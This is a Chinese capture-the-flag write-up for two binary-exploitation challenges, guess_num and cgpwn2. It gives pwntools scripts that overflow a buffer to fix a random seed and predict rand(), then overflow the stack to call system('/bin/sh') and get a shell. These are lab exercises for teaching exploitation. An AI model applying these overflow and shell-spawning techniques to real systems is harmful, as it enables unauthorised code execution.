攻防世界——pwn（3）

guess_num

seed和rand的知识点就是一个伪生成随机数的东西要用ctypes倒入这个库才能用rand

理一下思路，利用v7覆盖seed[0],使seed[0]已知，然后循环，然后直接拿flag就好了
exp

from pwn import * 
from ctypes import * #倒入了可以去找libc库
context.log_level = 'debug' 
p = remote("111.198.29.45",30571) 
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")在这个库里可以找到rand
pay = "A"*0x20 + p64(1) 从v7把seed[0]覆盖成1
p.sendlineafter("name:",pay)
libc.srand(1)
for i in range(10): 
  p.sendlineafter("number:",str(libc.rand()%6 + 1))
print p.recv() 

cgpwn

思路，name在bss段，把/bin/sh写进去，gets栈溢出执行system

from pwn import*

a=process("./cgpwn2")

bin_sh_addr=0x0804A080

a.recvuntil("please tell me your name\n")

a.sendline("/bin/sh\x00")

a.recvuntil("hello,you can leave some message here:\n")

system_addr=0x08048420

payload='A'*42+p32(system_addr)+p32(0x1234)+p32(bin_sh_addr)#注意返回地址一定要写

a.send(payload)

a.interactive()

``![`](https://img-blog.csdnimg.cn/20190411003039338.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDMxOTE0Mg==,size_16,color_FFFFFF,t_70)